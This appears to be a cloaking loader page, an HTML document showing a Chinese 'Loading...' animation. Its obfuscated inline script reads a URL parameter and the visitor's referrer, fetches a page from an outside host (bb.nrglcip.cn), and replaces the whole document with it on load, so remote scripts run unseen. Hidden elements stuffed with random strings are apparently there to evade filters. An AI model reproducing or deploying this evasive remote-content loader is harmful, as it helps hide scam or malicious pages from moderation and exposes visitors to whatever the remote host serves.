<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TvwNGJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TvwNGJ .PlS5miX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TvwNGJ .content {
            line-height: 50px;
            text-align: center
        }

        .TvwNGJ .img {
            width: 100%
        }

        .TvwNGJ .LA50vqnU {
            text-align: center
        }

        .TvwNGJ .LA50vqnU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TvwNGJ .LA50vqnU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TvwNGJ .LA50vqnU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TvwNGJ .LA50vqnU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TvwNGJ .LA50vqnU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TvwNGJ .LA50vqnU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TvwNGJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yVyhm5MlXIpQp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RNR63ku = yVyhm5MlXIpQp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RNR63ku +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RNR63ku +".html?a=share";
		}
		
        aMYZlN=url+"#"+new Date().getTime();
        aMYZlN && function() {
            $.get(aMYZlN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >K3eIns1AbiGZSMYGjro9G1WQ34fXof0bK0TXNjgdycTtS2FuYkLRpSmtLFLsayWL2hFS</b>
<b style='display:none' >K3eIns1AbiGZSMYGjro9G1WQ34fXof0bK0TXNjgdycTtS2FuYkLRpSmtLFLsayWL2hFS</b>
<div style='display:none'>YDRo3VvFFdyS2fexUNC8QclMgluvuFXnWsH3wrpQX0muEFBjmw4XYzcWwSIo3w9n13RNkAs7kDm2BnZ</div>
<div style='display:none'>YDRo3VvFFdyS2fexUNC8QclMgluvuFXnWsH3wrpQX0muEFBjmw4XYzcWwSIo3w9n13RNkAs7kDm2BnZ</div>
<ul style='display:none' >tdhIoEq2ecodQhpNY8bhb0QhOAt8LK8ZhY97LcptakjqKl1VFTcDYXEMVaCR4yNEtngqwL9uat</ul>
<p  style='display:none'>RsCQuHrTT9A72ddlY5eTXHjUxdc482npYsFlGlFoO18hrpm2RvFQ1llmi7u4kp0tW</p><div class="TvwNGJ">
    <div class="PlS5miX">
        <div class="LA50vqnU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >lb8s1G2G52BN09qumcrF4v</b>
<b style='display:none' >lb8s1G2G52BN09qumcrF4v</b>
<div style='display:none'>KZPMmX0ek9sSiv</div>
<p  style='display:none'>garFeqFGLJWzT270tpfwMdHuHWBw50tdKKQdx2ucAc5LmQTxT7Vgx97YtnQFKkGdUQM9hf</p>
<ul style='display:none' >oKcYrCJUAGun7juSB</ul>
<img  src='' style='display:none'>
<div style='display:none'>KZPMmX0ek9sSiv</div>
<img  src='' style='display:none'></body>
</html>